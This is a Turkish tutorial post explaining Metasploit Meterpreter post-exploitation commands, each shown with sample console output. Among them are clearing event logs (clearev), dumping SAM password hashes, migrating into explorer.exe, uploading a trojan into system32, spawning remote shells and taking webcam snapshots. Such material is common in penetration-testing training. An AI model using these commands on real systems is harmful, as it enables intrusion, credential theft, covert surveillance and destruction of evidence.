Metasploit İçinde Meterpreter Komutları

Estimated read time 8 min read

Bir önceki yazıda, kısaca Meterpreter’in ne olduğunu açıklamıştık. Şimdi de kullanılabilecek komutları detaylarıyla göreceğiz. Burada hemen hemen tüm komutlar açıklanmaya çalışılsa da bir kaç komut, ancak tecrübeyle anlaşılacağından eksik bırakılmıştır. Onları da zamanla açıklığa kavuşturacağız.

Meterpreter Komutları

help

Adından da anlaşılacağı gibi, Meterpreter içinde help komutunu verdiğinizde kullanılabilir komutları listeler ve kısa açıklamaları verir.

meterpreter > help

Core Commands
=============

  Command    Description
  -------    -----------
  ?       Help menu
  background  Backgrounds the current session
  channel    Displays information about active channels
...snip...

background

background komutu, aktif olan Meterpreter oturumunu (session) arka plana gönderir ve sizi tekrar msf > komut istemcisine getirir. Arka plandaki Meterpreter oturumuna geçmek için sessions komutundan faydalanabilirsiniz.

meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

cat

Linux işletim sistemlerinde cat komutu, bir dosya içeriğini ekrana yazdırmada kullanılır. Meterpreterde de aynı işe yarar.

meterpreter > cat
Usage: cat file

Example usage:
meterpreter > cat edit.txt
What you talkin' about Willis

meterpreter >

cd > pwd

cd komutu ile klasör değişimi yapılır. pwd komutu ile aktif olarak hangi klasörde olduğumuz görülebilir.

meterpreter > pwd
c:\
meterpreter > cd c:\windows
meterpreter > pwd
c:\windows
meterpreter >

clearev

clearev komutu, Clear Evidence yani delilleri temizleme anlamına gelir. Karşı tarafta açılan oturumda oluşturulan log dosyalarını temizlemeye çalışır.

meterpreter > clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...
meterpreter >

download

Karşı bilgisayardan bir dosya indirmeye yarar. İndirilen dosya, metasploit’i başlatırken yerel sisteminizde hangi klasördeyseniz, oraya kaydedilir.

meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >

edit

edit komutu, karşı taraftaki bilgisayarda bulunan bir dosyayı düzenlemek üzere vim editörde açar. Vim Editör kullanımı için Vim sayfasına bakabilirsiniz.

meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode       Size  Type Last modified       Name
----       ----  ---- -------------       ----
.
...snip...
.
100666/rw-rw-rw- 0    fil  2012-03-01 13:47:10 -0500 edit.txt

meterpreter > edit edit.txt

execute

execute komutu, karşı tarafta bir komut çalıştırmanızı sağlar. Dikkat ederseniz, Meterpreter’in kendi komutları çalıştırılmamakta. Karşı tarafın komut istemcisinde bir komut çalıştırılmaktadır.

meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

getuid

Karşı tarafta Meterpreter’in çalıştığı sistemin kullanıcı kimliğini görüntüler.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

hashdump

hashdump komutu, karşı taraftaki bilgisayarın SAM veri tabanını ortaya çıkarır. Tabii ki önceki Veri tabanı yazımızda belirttiğimiz gibi Workspace kullanıyorsanız, loot tablosuna kayıt eder.

meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
meterpreter >

idletime

Karşı taraftaki bilgisayar kullanıcısının, ne kadar zamandır işlem yapmadığını gösterir.

meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >

ipconfig

Karşı bilgisayarın ağ bilgilerini görüntüler.

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask   : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address : 192.168.1.104
Netmask   : 255.255.0.0

meterpreter >

lpwd > lcd

Meterpreter komut satırı açık iken vereceğiniz komutlar karşı taraf bilgisayarda işlem yaparlar. Halbuki biz kendi bilgisayarımızda bulunduğumuz klasörü görmek veya değiştirmek isteyebiliriz. Bu durumda Meterpreter’i geri plana göndermeden lpwd ve lcd komutlarıyla bu işlemi yapabiliriz. lpwd: Yerel bilgisayarda hangi klasörde olduğumuzu gösterir. (local print working directory) lcd: Yerel bilgisayarda istediğimiz klasöre geçmeye yarar. (local call directory)

meterpreter > lpwd
/root

meterpreter > lcd MSFU
meterpreter > lpwd
/root/MSFU

meterpreter > lcd /var/www
meterpreter > lpwd
/var/www
meterpreter >

ls

Linux İşletim sistemindeki ls komutuyla aynı işlemi yapar. Bulunulan klasördeki dosya ve klasörleri listeler.

meterpreter > ls

Listing: C:\Documents and Settings\victim
=========================================

Mode       Size   Type Last modified          Name
----       ----   ---- -------------          ----
40777/rwxrwxrwx  0    dir  Sat Oct 17 07:40:45 -0600 2009 .
40777/rwxrwxrwx  0    dir  Fri Jun 19 13:30:00 -0600 2009 ..
100666/rw-rw-rw- 218   fil  Sat Oct 03 14:45:54 -0600 2009 .recently-used.xbel
40555/r-xr-xr-x  0    dir  Wed Nov 04 19:44:05 -0700 2009 Application Data
...snip...

migrate

Meterpreter sunucumuz, karşı tarafta svchost.exe dosyasının içinde çalışıyor olabilir. Bunu başka bir programın içine gömülü hale getirmek istediğimizde migrate yani “göç et” komutunu kullanırız.

meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >

ps

Hedef bilgisayarda çalışan tüm işlemleri görüntüler.

meterpreter > ps

Process list
============

  PID  Name         Path
  ---  ----         ----
  132  VMwareUser.exe    C:\Program Files\VMware\VMware Tools\VMwareUser.exe
  152  VMwareTray.exe    C:\Program Files\VMware\VMware Tools\VMwareTray.exe
  288  snmp.exe       C:\WINDOWS\System32\snmp.exe
...snip...

resource

Karşı bilgisayara bağlandığınızda, yaptığınız işlemlerin bir süre sonra aynı şeyler olduğunu fark edersiniz. Örneğin, ls komutunu ver, cd c:\\Program Files ile programlar klasörüne gir vb. işlemleri hemen her zaman yaparsınız. İşte yerel bilgisayarda bir dosyaya, her satırda bir komut olacak şekilde bu işlemleri kayıt edip karşı tarafta çalıştırabilirsiniz. Bunun gerçekleşmesi için resource komutu kullanılmaktadır.

Burada dikkat edilmesi gereken konu, resource komutuna ilk vereceğiniz dosya yerele hangi klasördeyseniz (lpwd) orada aranır. İkinci parametre ise karşı tarafta hangi klasörde bulunuyorsanız (pwd) orada çalıştırılır.

meterpreter > resource 
Usage: resource path1 path2Run the commands stored in the supplied files.
meterpreter >
ARGUMENTS:

path1:		Yerel klasörümüzde bulunan toplu iş dosyamız.
Path2Run:	Komutların çalıştırılacağı karşı klasör

root@kali:~# cat resource.txt
ls
background
root@kali:~#
Running resource command:

meterpreter> > resource resource.txt
[*] Reading /root/resource.txt
[*] Running ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode       Size  Type Last modified       Name
----       ----  ---- -------------       ----
40777/rwxrwxrwx  0    dir  2012-02-29 16:41:29 -0500 .
40777/rwxrwxrwx  0    dir  2012-02-02 12:24:40 -0500 ..
100666/rw-rw-rw- 606   fil  2012-02-15 17:37:48 -0500 IDA Pro Free.lnk
100777/rwxrwxrwx 681984 fil  2012-02-02 15:09:18 -0500 Sc303.exe
100666/rw-rw-rw- 608   fil  2012-02-28 19:18:34 -0500 Shortcut to Ability Server.lnk
100666/rw-rw-rw- 522   fil  2012-02-02 12:33:38 -0500 XAMPP Control Panel.lnk

[*] Running background

[*] Backgrounding session 1...
msf exploit(handler) >

Karşı sistemde arama yapmamızı sağlar.

meterpreter > search -f autoexec.bat
Found 1 result...
  c:\AUTOEXEC.BAT
meterpreter > search -f sea*.bat c:\\xamp\\
Found 1 result...
  c:\\xampp\perl\bin\search.bat (57035 bytes)
meterpreter >

shell

shell komutu, Meterpreter içinde karşı sistemin Command Prompt satırına girmenizi sağlar.

meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

upload

Karşı sisteme bir dosya yüklemenizi sağlar. Hedef sistemin dosya gösterim notasyonu dikkate alınmalıdır. Ters tırnaklara dikkat edilmelidir.

meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading : evil_trojan.exe -> c:\windows\system32
[*] uploaded  : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >

webcam_list

Hedef sistemde kullanılabilir durumda olan web kameralarını listeler.

meterpreter > webcam_list
1: Creative WebCam NX Pro
2: Creative WebCam NX Pro (VFW)
meterpreter >

webcam_snap

Hedef sistemin web kamerasından bir adet fotoğraf alır ve yerelde bulunduğunuz klasöre .jpeg formatında kayıt eder.

meterpreter > webcam_snap -i 1 -v false
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
meterpreter >